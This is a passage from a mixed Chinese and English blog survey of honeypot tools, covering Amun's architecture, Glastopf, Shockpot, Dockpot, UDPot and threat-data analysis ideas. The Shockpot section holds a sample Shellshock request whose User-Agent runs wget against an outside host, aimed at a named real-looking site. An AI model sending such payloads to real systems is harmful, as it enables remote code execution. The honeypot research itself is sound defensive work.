Whenever the Shellcode Analyzer extracts a download URL from the payload of an exploit, any found IP address is checked against a list of local IP addresses (e.g. 192.168.0.0/24). If replace local ip is enabled, Amun will replace all those IP addresses with the one of the attacker who send the exploit. Local IP addresses in shellcode occur whenever a host behind a Network Adress Translation (NAT) server is infected 

7.  submit modules 
contains the modules that are responsible of handling any downloaded binary. The default module that is loaded is the submitmd5 module, that simply stores any downloaded unqiue file to harddisc. Uniqueness is determined by the MD5 hash of the file. 
Additional modules of this type allow the transmission of binaries to external services like CWSandbox

8. The log modules 
modules that perform certain logging functionality. In most cases these modules send information to external intrusion detection systems. 

9. vuln modules 
list contains all the vulnerability modules that should be load at the startup of Amun.  
modules listening on the same port answer to requests in the order they config in cile.

3. Request Handler

The Request Handler is responsible for all incoming and outgoing network traffic of the honeypot.
For every connection request, that reaches the Amun Kernel a Request Handler is created, that handles the connection until it is closed. The Request Handler maintains the list of loaded vulnerability modules and delegates the incoming traffic to those modules that are registered for the current port
Consider a connection coming in on port 445

1. if it is a new connection the Request Handler loads all vulnerability modules for port 445 by checking the vulnerability array at the key 445
2. In the next step the incoming traffic is distributed to each of the modules returned by the previous step.
3. Each of the vulnerability modules checks if the incoming traffic matches the service that is emulated and returns if it accepts or rejects the connection
4.  As a result, the list of emulated vulnerabilities for a connection is thinned out with each incoming request of the attacker. 
    1) In the worst case none of the registered modules matches the attack pattern and the connection is closed
    2) Otherwise, there is exactly one module left, which successfully emulates all needed steps performed by the attacker and receives the final payload containing the download information of the malware
//Note that incoming network packets can be distributed to all registered vulnerabilitiy modules, but a reply can only be send by one. In the best case there should only be one module left to reply after the first packet is received, however, if there are more left, the reply of the first module in the list is chosen. 

5. Connections that for some reason do not match any of the vulnerability modules, or do not fit an emulated service at any stage create a log entry in the Amun Request Handler log. This log contains information about the attacking host and the request that was send. This information help to update existing vulnerability modules or create new ones. 

6. The Request Handler also receives the results of the vulnerability module that successfully emulated a service and obtained the exploit payload from the attacker. This payload is passed on to the Shellcode Analyzer to detect any known shellcode. The results of the Shellcode Analyzer are again returned to the Request Handler, thus the Request Handler is the crucial point for any attack.

4. Vulnerability Modules

The vulnerability modules make up the emulated services which lure autonomous spreading malware. Each module represents a different service, for example a FTP server. The services are emulated only to the degree that isneededtotriggeracertainexploit. Thatmeans,theemulated services cannot be regularly used, i.e. they do not offer the full functionality of the original service.
從這個角度來講，amun是一個漏洞導向的honypot，而不是一個低交互/高交互的honypot
Vulnerabilities are realized as finite state machines，They usually consist of several stages that lead through the emulated service.

That means, each incoming network packet of an attacker is matched against the next state of the finite state machine. Ifitmatches,thestateofthevulnerbilitymoduleswitches to the next stage, otherwise the vulnerabilitiy module rejects the incoming request. That way Amun assures that only requests that lead to the exploit of the emulated serviceareaccepted. Alldatathatleadstoanundefinedstate is logged by the Request Handler.

5. Shellcode Analyzer

In case a vulnerability module successfully emulated a service to the point where the attacker sends exploit code, all incoming datais recorded and finally transferred to the Shellcode Analyzer. The Shellcode Analyzer is the backbone of Amun, as it is responsible for shellcode recognition and decoding. Shellcode is recognized using several regular expression that match known parts of shellcode. In most cases this is the decoder part,a small loop that decodes the obfuscated shellcode back to its original

6. Download Modules

As described in the previous section the Shellcode Analyzer extracts the commands from the shellcode. These commands end up to be some kind of download method to get the actual malware, e.g. the worm binary. As the goal of Amun is to capture autonomously spreadingmalware,wewanttogetholdofanyadvertised binary file, thus we need Amun to be able to handle different kinds of download methods. For each download method we can provide a module that is loaded upon the start of the honeypot. Amun currently provides four basic download modules, namely

1. HTTP
2. FTP
3. TFTP
4. direct download. 

7. Submission Modules

Once a file has been downloaded using any of the above mentioned download modules it needs to be processed further. That means it can be stored to harddisc for example, or send to a remote service. In the default configuration Amun only loads the submit-md5 module. This modules stores each downloaded binary to a certain folder on the harddrive. As a filename it uses the MD5 hash of the content of the file.

Relevant Link:

https://ub-madoc.bib.uni-mannheim.de/2595/1/amunhoneypot2.pdf
http://subs.emis.de/LNI/Proceedings/Proceedings170/177.pdf
https://sourceforge.net/projects/amunhoney/

 

6. Glastopf web honeypot

Glastopf is a Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications.
Glastopf的核心策略不是100%模擬一個高交互的WEB系統，它的目標是針對自動化漏洞掃描/利用工具，經過對漏洞利用方式進行歸類，總體都某一類的利用方式返回對應的合理結果，以此實現低交互的目的

0x1: 整體架構圖

0x2: Remote File Inclusion

This attack principle is very easy: Include the malicious file in vulnerable code in the web application and have it run on the compromised web server. Most of the time the attacker expects some kind of feedback from his code if the injection has been successful. And that's where we get involved.

0x3: Local File Inclusion

Another handled attack type is Local File Inclusion. In this type of approach, the attacker tries to use a vulnerability to obtain security critical system information or to execute previously injected code. If the attacker tries to include system files like passwd or shadow, Glastopf replies with a dynamically generated file, similar to the requested one, to provoke and encourage further
attacks. If Glastopf is unable to categorize the attack, it is merely logged in our database. An exception are requests on the web server root folder and index.* requests. 

0x4: General approach

1. Vulnerability type emulation instead of vulnerability emulation. Once a vulnerability type is emulated, Glastopf can handle unknown attacks of the same type. While implementation may be slower and more complicated, we remain ahead of the attackers until they come up with a new method or discover a new flaw in our implementation.

2. Modular design to add new logging capabilities or attack type handlers. Various database capabilities are already in place. HPFeeds logging is supported for centralized data collection.

3. Popular attack type emulation is already in place: Remote File Inclusion via a build-in PHP sandbox, Local File Inclusion providing files from a virtual file system and HTML injection via POST requests.

4. Adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provides those keywords (AKA "dork") and additionally extracts them from requests, extending its attack surface automatically. As a result, the honeypot gets more and more attractive with each new attack attempted on it.

5. make the SQL injection emulator public, provide IP profiling for crawler recognition and intelligent dork selection.

0x5: INSTALL

1. Prerequisites

sudo apt-get update
sudo apt-get -y install python2.7 python-openssl python-gevent libevent-dev python2.7-dev build-essential make
sudo apt-get -y install python-chardet python-requests python-sqlalchemy python-lxml
sudo apt-get -y install python-beautifulsoup mongodb python-pip python-dev python-setuptools
sudo apt-get -y install g++ git php5 php5-dev liblapack-dev gfortran libmysqlclient-dev
sudo apt-get -y install libxml2-dev libxslt-dev
sudo pip install --upgrade distribute

2. Install and configure the PHP sandbox

cd /opt
sudo git clone git://github.com/mushorg/BFR.git
cd BFR
sudo phpize
sudo ./configure --enable-bfr
sudo make && sudo make install

Open the php.ini file and add bfr.so accordingly to the build output:

vim /etc/php5/cli/php.ini
zend_extension = /usr/lib/php5/20121212/bfr.so

3. Install glastopf

//若是遇到: NameError: name 'sys_platform' is not defined
rm -rf /usr/local/lib/python2.7/dist-packages/distribute-0.7.3-py2.7.egg-info/
rm -rf /usr/local/lib/python2.7/dist-packages/setuptools*

//若是遇到: E: Unable to locate package python-logstash
pip install python-logstash

maybe install distribute manually:
wget https://pypi.python.org/packages/source/d/distribute/distribute-0.6.35.tar.gz
tar -xzvf distribute-0.6.35.tar.gz
cd distribute-0.6.35
python setup.py install

//安裝過程當中遇到python庫的缺失
pip install MarkupSafe

//若是: sudo pip install glastopf安裝失敗
cd /opt
sudo git clone https://github.com/mushorg/glastopf.git
cd glastopf
sudo python setup.py install

4. Configuration

cd /opt
sudo mkdir myhoneypot
cd myhoneypot
sudo glastopf-runner

A new default glastopf.cfg has been created in myhoneypot, which can be customized as required.

vim glastopf.cfg
[hpfeed]
enabled = false

db/glastopf.db保存了WEB交互的全部原始數據，是一個本地sqlite文件

Relevant Link:

http://glastopf.org/
http://honeynet.org/papers/KYT_glastopf
http://honeynet.org/sites/default/files/files/KYT-Glastopf-Final_v1.pdf
https://github.com/mushorg/BFR
https://github.com/mushorg/glastopf

 

7. Wordpot

Wordpot is a Wordpress honeypot which detects probes for plugins, themes, timthumb and other common files used to fingerprint a wordpress installation.

Relevant Link:

https://github.com/gbrindisi/wordpot

 

8. Conpot SCADA/ICS honeypot

Conpot is an ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems

Relevant Link:

https://www.honeynet.org/node/1047
https://github.com/mushorg/conpot
https://www.honeynet.org/taxonomy/term/304

 

9. phoneyc 

PhoneyC is a virtual client honeypot, meaning it is not a real application but rather an emulated client. By using dynamic analysis, PhoneyC is able to remove the obfuscation from many malicious pages. Furthermore, PhoneyC emulates specific vulnerabilities to pinpoint the attack vector. PhoneyC is a modular framework that enables the study of malicious HTTP pages and understands modern vulnerabilities and attacker techniques.

Relevant Link:

https://github.com/honeynet/phoneyc
https://code.google.com/archive/p/phoneyc/
http://citeseer.ist.psu.edu/viewdoc/summary;jsessionid=E30296F5A6B4C85ABBB46C3429974791?doi=10.1.1.148.5317
https://www.usenix.org/legacy/event/leet09/tech/full_papers/nazario/nazario.pdf
https://honeynet.org/project/PhoneyC

 

10. shockpot

Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271.

0x1: Installation

git clone https://github.com/threatstream/shockpot.git
cd shockpot
apt-get install python-virtualenv
virtualenv env
. env/bin/activate
pip install -r requirements.txt 
//下載bottle框架主文件
wget https://github.com/bottlepy/bottle/raw/master/bottle.py

0x2: Configuration

vim shockpot.conf
[server]
host = 0.0.0.0
port = 8080

[headers]
server = Apache/2.0.55 (Debian) PHP/5.1.2-1+b1 mod_ssl/2.0.55 OpenSSL/0.9.8b

[hpfeeds]
enabled = false
host = 127.0.0.1
port = 10000
identity = shockpot
secret = secret
channel = shockpot.events
only_exploits = True

[fetch_public_ip]
enabled = True
urls = ["http://www.telize.com/ip", "http://queryip.net/ip/", "http://ifconfig.me/ip"]

# put any variables in here that you want to render in your template.html. 
[template]
title = It Works!

0x3: Running

python shockpot.py

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 
Host: help.tenpay.com 
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www.baidu.com
Connection: keep-alive

Relevant Link:

http://blog.csdn.net/jiayanhui2877/article/details/39584003
http://blog.csdn.net/huithe/article/details/8087645
https://pypi.python.org/pypi/bottle/0.12.9
https://github.com/bottlepy/bottle
https://github.com/threatstream/shockpot

 

11. MHN(Modern Honey Network)

From the secure deployment to the aggregation of thousands of events MHN provides enteprise grade management of the most current open source honeypot software. MHN is completely free open source software which supports external and internal honeypot deployments at a large and distributed scale

Relevant Link:

http://drops.wooyun.org/papers/5968
http://threatstream.github.io/mhn/

 

12. Database Honeypots

Relevant Link:

1. Elastic honey - A Simple Elasticsearch Honeypot
https://github.com/jordan-wright/elastichoney

2. mysql - A mysql honeypot 
https://github.com/schmalle/MysqlPot

3. NoSQLpot - The NoSQL Honeypot Framework.
https://github.com/torque59/nosqlpot

4. ESPot - ElasticSearch Honeypot
https://github.com/mycert/ESPot

 

13. awesome-honeypots

https://github.com/paralax/awesome-honeypots

 

14. Honey Drive

HoneyDrive是一款Linux蜜罐系統，它是以虛擬設備(OVA)的方式安裝在Xubuntu 12.04.4版本上面。HoneyDrive系統裏面包含了10款預裝和預配置的蜜罐軟件，如

1. Kippo SSH honeypot
2. Dionaea
3. Amun malware honeypots
4. Honeyd low-interaction honeypot
5. Glastopf web honeypot
6. Wordpot
7. Conpot SCADA/ICS honeypot
8. Thug
9. PhoneyC honeyclients等

系統還提供了一些腳本和工具來分析數據，而且數據經過可視化的方式呈現。如Kippo-Graph, Honeyd-Viz, DionaeaF和ELK stack等

0x1: 特色

1. 基於Xubuntu 12.04.4 LTS虛擬設備
2. 預安裝LAMP(Apache 2, MySQL 5)，還有其餘的一些管理工具，如phpMyAdmin
3. Kippo SSH蜜罐，加上Kippo-Graph, Kippo-Malware, Kippo2MySQL和其餘一些腳本
4. Dionaea蜜罐，配套DionaeaFR和腳本
5. Amun蜜罐和腳本
6. Glastopf Web蜜罐和Wordpot WordPress蜜罐
7. Conpot SCADA/ICS蜜罐
8. Honeyd低交互蜜罐等等
//取證與分析工具、網絡監控、PDF分析等，如
1. ntop
2. p0f
3. EtherApe
4. nmap
5. DFF
6. Wireshark
7. Recon-ng
8. ClamAV
9. ettercap
10. MASTIFF
11. Automater
12. UPX
13. pdftk
14. Flasm
15. Yara
16. Viper
17. pdf-parser
18. Pyew
19. Radare2
20. dex2jar等

Relevant Link:

http://bruteforce.gr/honeydrive
http://www.freebuf.com/tools/40865.html

 

15. Dockpot

Dockpot is a high interaction SSH honeypot based on Docker. It's basically a NAT device that has the ability to act as an SSH proxy between the attacker and the honeypot (Docker container in that case) and logs the attacker's activities. It will create a new docker container for the first connection it gets, NAT the SSH connections to it, destroy the container when the number of the connections to it is zero.

0x1: Install

apt-get install docker
curl -sSL https://get.docker.com/ > installdocker.sh
sh ./installdocker.sh

git clone https://github.com/aabed/dockpot.git
cd dockpot
./honsshctrl.sh START

Relevant Link:

https://github.com/aabed/dockpot  

 

16. SSDP Honeypot

16. 咱們該怎麼利用蜜罐系統進行入侵分析

我以爲咱們對於蜜罐的研究有幾個點是能夠重要去進行深刻的

1) 蜜罐怎麼提供更好的交互性、是否考慮在真實的原始系統基礎上進行旁路，提取咱們須要的數據，即依託於真實系統的高交互蜜罐

2) 徹底利用虛擬機進行模擬服務，徹底架設出一個虛擬的環境，這種狀況下安全性是最可控的，但同時對shellcode虛擬執行、命令虛擬執行、系統調用虛擬執行、甚至CPU指令虛擬執行等虛擬化
技術須要較高的支持，這方面已經有不少開源項目在進行了，有不少x86下的虛擬沙箱提供了很好的模擬特性

3) 怎麼將安全人員的對抗經驗固化到數據建模上，咱們在捕獲到儘量多的入侵軌跡數據的同時，還要思考的一個重要問題是怎麼對這些數據進行多維度的建模、分析。數據自己是沒有意義的，
只有咱們安全人員將它們賦予了必定的意義，經過多維度的重組後，數據纔會以一種模式、趨勢的形式展示出背後的含義，這是入侵分析、對抗中最重要的

4) 將分佈式蜜罐技術和雲計算、大數據結合起來。在雲模式下，部署分佈式蜜罐的基本條件已經自然完成了，安全人員不須要專門去架設專用蜜罐系統，雲平臺自己就能夠充當一個入侵、攻擊軌跡
數據的來源，即大數據分析。咱們要作的就是怎麼更有效地分析這些數據。要作到這點，仍是須要理論和實踐的結合，以安全人員的經驗爲基礎，同時依託相應的理論創建相應的分析模型

如下內容來自 http://www.keyfocus.net/，它們的分析維度我以爲頗有啓發性

http://tech.sina.com.cn/s/2008-09-01/2301789129.shtml

EVENT方面
1. start time: 行爲開始時間
2. end time: 行爲中止時間
3. event ID: 事件ID
4. TYPE: 鏈接方式
5. DISCSRIPTION: 事件詳細描述
6. SERVERITY: 事件激烈程度

VISITOR方面
1. IP: 入侵者IP
2. PORT: 入侵者使用的端口
3. DOMAIN: 入侵者機器名

SENSOR方面
1. IP: 探測器使用者IP
2. PORT: 探測器被入侵端口
3. BOUND: 探測器所綁定的IP
4. PROTOCOL: 協議類型
5. ACTION: 探測器對此事件所作出的行爲
6. SIM SERVER: 簡明(預設置)的SERVER BANNER

DETAILS方面
1. CLOSED BY: 最後是由哪一方關閉這次鏈接的
2. Limit Exceeded: 超出流量描述
3. RECEIVED: 從入侵者發出，由探測器接收到的數據
4. RESPONSE: 從探測器發出，由入侵者接收到的數據
5. "EXPAND"按鈕: 展開(展開後能夠選擇多種顯示格式,在'FORMAT'欄上能夠選擇)
6. "NEXT"按鈕: 下一個ID的事件詳細狀況
7. "PREVIOUS"按鈕: 前一個ID的事件詳細狀況  

諸葛建偉的研究論文中也提到了不少頗有啓發意義的分析維度

威脅數據分析方法

1. 最基礎的威脅數據分析機制爲實證分析, 即經過對實驗採集數據進行統計彙總,揭示出安全威脅的基本統計特性以更好地理解互聯網上的"攻擊策略"與"工具"

2. 可視化分析技術能夠進一步對蜜罐捕獲的安全威脅數據進行2D 圖形化與3D 動畫效果展現,以很是直觀的方式將威脅數據展現給安全研究人員,使其快速理解捕獲安全威脅的總體態勢,並發現其
中可能包含的異常事件
(這點我以爲就是DionaeaFR的目標)

3. 更進一步的威脅數據分析方法可以解釋出捕獲數據背後的根源。採用PCA(principal component analysis)方法從Leurré.com 分佈式蜜罐系統數據提取出潛在的"攻擊行爲聚類", 並進
行"歸因分析"

4. 基於"攻擊時序類似性"的聚類方法, 從蜜網數據中發現廣泛的攻擊模式

5. 應用了"關聯分析方法", 在安全知識庫的支持下,該方法可以從蜜網捕獲安全威脅數據中識別出"攻擊規劃", 並重構出攻擊過程場景,從而有助於安全研究人員更好地發現和理解捕獲數據中蘊
含的"攻擊場景"
(這裏的安全知識庫，我以爲就是一種將安全工程師的入侵分析經驗的固化，將經驗模式化爲一些類正則代碼，從而更好地進行模式匹配)

 

17. Detecting Honeypots(反檢測-蜜罐檢測技術)

Although honeypots are a great resource for investigating adversaries or automatic exploitation via worms, the amount of information we can learn depends on how realistic the honeypots are. If an adversary breaks into a machine and immediately notices that she broke into a honeypot, her reaction might be to remove all evidence and leave the machine alone. On the other hand, if the fact that she broke into a honeypot remains undetected, she could use it to store attack tools and launch further attacks on other systems. This makes it very important to provide realistic-looking honeypots. For low-interaction honeypots, it is important to deceive network scanning tools and for high-interaction honeypots, the whole operating system environment has to look very real. This is not a problem for a physical high-interaction honeypots, but for a system running under a virtual machine, it becomes more difficult to hide its nature.

0x1: Detecting Low-Interaction Honeypots

0x2: Detecting High-Interaction Honeypots

0x3: Detecting Rootkits

Relevant Link:

http://books.gigatux.nl/mirror/honeypot/final/ch09lev1sec1.html
https://github.com/a0rtega/pafish

 

18. DNS Honeypot

0x1: UDPot

git clone https://github.com/jekil/UDPot.git
cd UDPot
pip install -r requirements.txt
pip install twisted
python dns.py -h
usage: dns.py [-h] [-p DNS_PORT] [-c REQ_COUNT] [-t REQ_TIMEOUT] [-s] [-v] server

positional arguments:
  server: DNS server IP address

optional arguments:
  -h, --help: show this help message and exit
  -p DNS_PORT, --dns-port DNS_PORT: DNS honeypot port
  -c REQ_COUNT, --req-count REQ_COUNT: how many request to resolve
  -t REQ_TIMEOUT, --req-timeout REQ_TIMEOUT: how many request to resolve
  -s, --sql: database connection string
  -v, --verbose: print each request

You can run the DNS honeypot with the following command, you have to add the IP of the DNS server you use to resolve the first bunch of queries to seems like an open resolver (in this example we use 8.8.8.8):

python dns.py 8.8.8.8 -v -p 53

Now your DNS honeypot is listening on both port 5053 UDP and TCP. If you want to bind it to port 53 you have to:

1. run it as root and use option -p which is really not recommended
2. add an iptables rule to redirect traffic from port 53 to port 5053

Example iptables rules to redirect traffic:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 53 -j REDIRECT --to-ports 5053
iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-ports 5053

Some other arguments are optional:

-p is used to bind DNS honeypot service on a given port
-c how many requests should be resolved (sending a DNS reply) like a real open resolver
-t timeout to re-start resolving requests (sending a DNS reply) like a real open resolver
-s choose a SQL database (default SQLite)
-v verbose logging (prints each request)

Relevant Link:

https://github.com/jekil/UDPot

 

Copyright (c) 2016 LittleHann All rights reserved